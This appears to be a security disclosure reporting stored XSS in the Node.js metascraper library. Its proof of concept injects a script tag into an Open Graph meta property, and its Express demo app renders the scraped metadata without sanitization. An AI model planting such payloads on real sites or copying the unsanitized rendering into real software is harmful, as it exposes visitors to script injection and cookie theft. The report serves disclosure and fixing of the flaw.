Lucene search

HistoryJan 25, 2018 - 9:27 p.m.

Node.js third-party modules: [metascraper] Stored XSS in Open Graph meta properties read by metascrapper


0.001 Low




Hi Guys,

metascrapper is vulnerable to Stored XSS via Open Graph metadata, if they are used in HTML without any sanitization.


A library to easily scrape metadata from an article on the web using Open Graph metadata, regular HTML metadata, and series of fallbacks.


Due to lack of HTML sanitization, there is possibility to embed malicious code in any of metadata read by metascrapper. When library reads such metadata, there is no sanitization performed. If output from metascrapper is used directly in HTML code, any HTML embed in metadata is executed in context of the page which load and render it.

Steps To Reproduce:

This part of PoC represents An Attacker

An attacker needs to inject malicious code into any of Open Graph property.

  • create website (I serve it via static server available at witt the following content. Please take a look at payload embed in og:site_name meta property:
<!doctype html>
<html xmlns:og="" lang="en">

    <meta charset="utf8">

    <meta property="og:description" content="The HR startups go to war.">
    <meta property="og:image" content="image">
    <meta property="og:site_name" content='<script src=""></script>'>
    <meta property="og:title" content="test article">
    <meta property="og:type" content="article">
    <meta property="og:url" content="">

  • save it as article.html in the root directory of the server runs on

  • create malware.js file with following content and save it in the same directory as article.html:

alert('Uh oh, I am very bad malware!')

Please be aware that JavaScript file with malicious code can be served from ANY place. This particular location is only for Poc.

This represents an HTML page which can be “scrapped” with metascrapper

This part of PoC represents legitimate User and an attack itself

  • install metascrapper and required dependiences (got and express)
$ npm install metascrapper got express
  • create an app which will use metascrapper to read webiste metadata. is address of server which uses metascrapper. is target website, where from metadata will be read:

const metascraper = require('metascraper')
const got = require('got')
const express = require('express')

const targetUrl = ''

const app = express()

app.get('/scrap', function(req, res) {;
    (async() => {
        const {
            body: html,
        } = await got(targetUrl)
        const metadata = await metascraper({
        console.log(metadata)  // see returned metadata in console:
            { author: null,
                date: null,
                description: 'The HR startups go to war.',
                image: '',
                lang: 'en',
                logo: null,
                publisher: '<script src=""></script>',
                title: 'test article',
                url: '' }
        // display content of metadata.publisher in the browser
        let __html = `
                <p>site title: ${metadata.title}</p>
                <p>site publisher: ${metadata.publisher}</p>

app.listen(8888, () =&gt; console.log('Example app listening on port 8888!'))
  • run above app:
$ node app.js
  • go to

  • malicious JavaScript code embed in site metadata og:site_name is executed:


As we can notice, our payload was displayed in the source page “as is”:


Supporting Material/References:

Configuration I’ve used to find this vulnerability:

  • macOS HighSierra 10.13.3
  • node 8.9.3
  • npm 5.5.1
  • curl 7.54.0

Wrap up

I hope this report will help to keep Node ecosystem more safe. If you have any questions about any details of this finding, please let me know in comment.

Thank you


Rafal ‘bl4de’ Janicki


Although this is quite hard to exploit in the wild, there is no doubt such attack is possible. This might lead to malware distribution, session cookies from infected websites leaks, run cryptocurrency miners in users’ browsers and many more attacks.

0.001 Low


